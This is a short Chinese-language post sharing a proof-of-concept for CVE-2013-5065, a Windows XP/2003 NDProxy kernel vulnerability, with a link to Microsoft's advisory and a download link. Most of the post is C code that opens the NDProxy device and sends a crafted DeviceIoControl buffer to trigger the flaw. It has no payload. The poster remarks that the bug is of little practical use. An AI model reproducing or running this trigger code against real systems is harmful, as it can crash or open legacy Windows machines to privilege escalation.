CVE-2013-5065 PoC

这个是有07大牛带出来的poc 微软安全公告: http://technet.microsoft.com/zh-cn/security/advisory/2914486 受影响系统: XP, 2003 PoC: [php] #include #include int main() { HANDLE hDev = CreateFile("\\\\.\\NDProxy", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); if(hDev==INVALID_HANDLE_VALUE) { printf("CreateFile Error:%d\n",GetLastError()); } DWORD InBuf[0x15] = {0}; DWORD dwRetBytes = 0; *(InBuf+5) = 0x7030125; *(InBuf+7) = 0x34; DeviceIoControl(hDev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, &dwRetBytes, 0); CloseHandle(hDev); return 0; }[/php] v5 华丽丽的表示鸡肋了,一般谁会开启这个服务啊 下载地址:点我下载

发表评论